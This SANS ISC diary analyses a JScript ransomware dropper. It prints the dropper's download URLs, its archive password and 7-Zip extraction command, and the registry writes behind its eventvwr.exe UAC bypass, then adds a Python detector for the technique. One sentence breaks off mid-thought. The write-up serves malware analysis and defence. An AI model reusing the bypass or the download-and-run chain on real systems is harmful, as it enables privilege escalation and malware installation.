
UAC Bypass in JScript Dropper, (Tue, Dec 13th)


Yesterday, one of our readers sent us a malicious piece of JScript: doc2016044457899656.pdf.js.js. It's always interesting to have a look at samples coming from alternate sources because they may differ slightly from what we receive on a daily basis. Just yesterday, my spam trap collected 488 ransomware samples from different campaigns, all based on the same techniques.

The JScript code was, of course, obfuscated, but it could still easily be read by a human. Usually there is no need to implement complex obfuscation to bypass AV detection: this sample had a score of 8/54 on VT. What was different? First of all, it just tries to download two files from a remote server:

  • http://45.58.49.54/7za.exe
  • http://45.58.49.54/process.zip

The bad guy was lazy (or smart?) and did not implement

The archive password is hard-coded as a hex-encoded string that the script decodes at runtime (LXCTAOHOHSYOAASHNDCA is the script's own decoding routine):

    var AACRSODLXACCGDOLOSOX = LXCTAOHOHSYOAASHNDCA("6D696E617331303030");

Decoding 6D696E617331303030 from hex gives minas1000, the password used for the archive below.

The destination path is generated via multiple variables and is finally set to C:\Users\[user]\AppData\Local\, [user] being the victim's user name. The downloaded archive, saved under the name COCNOACTXATASGNOTOAS, is then extracted in place with the 7-Zip command-line tool (x = extract with full paths, -p = password, -o = output directory):

    C:\Users\[user]\AppData\Local\7za.exe x C:\Users\[user]\AppData\Local\COCNOACTXATASGNOTOAS -pminas1000 -o C:\Users\[user]\AppData\Local\

Two new PE files are stored on the file system and then executed:

  • processexplorerpe.exe (55c0548290a5dc43bc54a6a15ccd42fd) [2]
  • peprocesss.exe (6b96e8a9c13966086b1e2dd65ac84656) [3]

What makes this sample different? After the classic execution of the PE files, it tries to bypass Windows UAC using a behaviour of eventvwr.exe. This system tool is auto-elevated: when a member of the local Administrators group starts it, it runs as a high-integrity process without a consent prompt. To display its console it starts mmc.exe with eventvwr.msc, and to find the handler for .msc files it queries the registry, looking under HKCU\Software\Classes before falling back to the machine-wide definition in HKCR. Because HKCU is writable by the unprivileged user, a medium-integrity process can plant its own command there and have eventvwr.exe run it at high integrity. Note that this only removes the prompt for an account that is already an administrator: for a standard user eventvwr.exe does not auto-elevate, so the hijacked command would run with no more rights than the script already has, and later Windows 10 releases changed eventvwr.exe so that it no longer honours the per-user key. More information about this behaviour is available on the Microsoft website[4].

The trick is to create the registry entry that eventvwr.exe checks and to store the path of the malicious binary (kept in the variable ODASTATACOTSTAODHOOD) as its default value:

    var WshShell = WScript.CreateObject("WScript.Shell");
    // trailing backslash in the key name: write the key's (Default) value
    WshShell.RegWrite("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\\", ODASTATACOTSTAODHOOD, "REG_SZ");

The script then builds the path to eventvwr.exe from the WINDIR environment variable and prepares a WScript.Shell object to launch it, so that the auto-elevated process starts the planted command instead of mmc.exe:

    // environmentVars() is the script's own helper that expands an environment variable
    var ZLGOZYLOLHONHTXTAOOR = environmentVars("WINDIR") + "\\SYSTEM32\\" + "eventvwr.exe";
    AAOGAODYSCSTSOAOLHAC = new ActiveXObject("Wscript.Shell");

Finally, the script cleans up after itself and removes the registry entry again (/ve targets the default value, /f suppresses the confirmation prompt):

    var wshShell = new ActiveXObject("WScript.Shell");
    wshShell.Run("REG DELETE HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /f");

More information about this technique to bypass UAC is available on GitHub[5], with a PoC script in PowerShell.
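From the defender's side, the sequence above leaves two artefacts the dropper cannot avoid: a write to the per-user mscfile handler key, and a child of eventvwr.exe that is not mmc.exe. The following Python is an added example for this diary (it is neither the dropper's code nor an ISC tool) that runs those two rules over a constructed stream of Sysmon-style JSON events. The Sysmon field names (EventID, EventType, Image, ParentImage, TargetObject, Details, IntegrityLevel) are the real ones; the SID, the user name "victim" and the payload path are invented, and the last two events (a normal Event Viewer launch and an installer writing the machine-wide HKLM key) are benign controls that must not fire.

```python
"""Detection rules for the eventvwr.exe UAC bypass, run over Sysmon-style events.

Added example for this diary; not the dropper's code and not an ISC tool.
The events in SAMPLE_EVENTS are constructed (SID, user name and payload
path invented); the Sysmon field names are the real ones.
"""
import json
import re

# Sysmon records per-user hives as HKU\<SID>\...; the dropper's own HKCU\...
# spelling is accepted too. Only the user-writable hive is interesting: the
# machine-wide HKLM\Software\Classes\mscfile key is what installers set.
USER_MSCFILE_HANDLER = re.compile(
    r"^(?:HKU\\[^\\]+|HKCU)\\Software\\Classes\\mscfile\\shell\\open\\command(?:\\|$)",
    re.IGNORECASE,
)

REGISTRY_EVENT_IDS = {12, 13, 14}  # Sysmon: key/value create-delete, value set, rename
PROCESS_CREATE_ID = 1              # Sysmon: process create


def image_name(path):
    """Lower-cased file name of an Image/ParentImage field."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_registry_event(ev):
    """Any touch of the per-user mscfile handler key: the RegWrite, a rename,
    or the REG DELETE clean-up. Returns a finding string or None."""
    if ev.get("EventID") not in REGISTRY_EVENT_IDS:
        return None
    if not USER_MSCFILE_HANDLER.match(ev.get("TargetObject", "")):
        return None
    return "per-user mscfile handler %s by %s: %s -> %r" % (
        ev.get("EventType", "touched"),
        ev.get("Image", "?"),
        ev["TargetObject"],
        ev.get("Details", ""),
    )


def check_process_event(ev):
    """eventvwr.exe normally starts exactly one child, mmc.exe. Anything else
    it spawns (at high integrity) is the hijacked handler running."""
    if ev.get("EventID") != PROCESS_CREATE_ID:
        return None
    if image_name(ev.get("ParentImage", "")) != "eventvwr.exe":
        return None
    if image_name(ev.get("Image", "")) == "mmc.exe":
        return None
    return "eventvwr.exe spawned %s at %s integrity (expected mmc.exe)" % (
        ev.get("Image", "?"),
        ev.get("IntegrityLevel", "?"),
    )


def scan(lines):
    """Parse JSON-lines events and return the list of findings, in log order."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        for check in (check_registry_event, check_process_event):
            hit = check(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed event stream modelled on what the dropper would produce,
# followed by two benign controls (normal Event Viewer launch, installer
# setting the machine-wide handler) that must not fire.
SAMPLE_EVENTS = r'''
{"EventID": 1, "Image": "C:\\Windows\\System32\\wscript.exe", "ParentImage": "C:\\Windows\\explorer.exe", "IntegrityLevel": "Medium", "CommandLine": "wscript.exe doc2016044457899656.pdf.js.js"}
{"EventID": 13, "EventType": "SetValue", "Image": "C:\\Windows\\System32\\wscript.exe", "TargetObject": "HKU\\S-1-5-21-1004336348-1177238915-682003330-1001\\Software\\Classes\\mscfile\\shell\\open\\command\\(Default)", "Details": "C:\\Users\\victim\\AppData\\Local\\payload.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\eventvwr.exe", "ParentImage": "C:\\Windows\\System32\\wscript.exe", "IntegrityLevel": "High", "CommandLine": "C:\\Windows\\SYSTEM32\\eventvwr.exe"}
{"EventID": 1, "Image": "C:\\Users\\victim\\AppData\\Local\\payload.exe", "ParentImage": "C:\\Windows\\System32\\eventvwr.exe", "IntegrityLevel": "High", "CommandLine": "C:\\Users\\victim\\AppData\\Local\\payload.exe"}
{"EventID": 12, "EventType": "DeleteValue", "Image": "C:\\Windows\\System32\\reg.exe", "TargetObject": "HKU\\S-1-5-21-1004336348-1177238915-682003330-1001\\Software\\Classes\\mscfile\\shell\\open\\command\\(Default)"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\mmc.exe", "ParentImage": "C:\\Windows\\System32\\eventvwr.exe", "IntegrityLevel": "High", "CommandLine": "C:\\Windows\\system32\\mmc.exe C:\\Windows\\system32\\eventvwr.msc /s"}
{"EventID": 13, "EventType": "SetValue", "Image": "C:\\Windows\\System32\\msiexec.exe", "TargetObject": "HKLM\\Software\\Classes\\mscfile\\shell\\open\\command\\(Default)", "Details": "%SystemRoot%\\system32\\mmc.exe \"%1\" %*"}
'''

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS.splitlines()):
        print(finding)
```

Running it prints three findings: the SetValue by wscript.exe, payload.exe spawned by eventvwr.exe at High integrity, and the DeleteValue by reg.exe. The HKLM write is deliberately ignored because that is where a legitimate installer registers the .msc handler; the bypass works precisely because the per-user key under HKCU\Software\Classes is consulted first. The REG DELETE clean-up is a signal in its own right, so removing the key afterwards does not erase the trail.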

If you receive interesting samples, feel free to share them! We always need fresh meat!

[1] http://www.7-zip.org/download.html
[2] https://www.virustotal.com/en/file/305fe0e8e8753dd2bf79fd349760b5c83d75097becc98a541b489bd5456b7b5e/analysis/
[3] https://www.virustotal.com/en/file/7b1f0831ea6943fb1f2a2714f71b16c890baf15c985833e0a590fe6545c7e16f/analysis/
[4] https://msdn.microsoft.com/en-us/library/bb742441.aspx
[5] https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
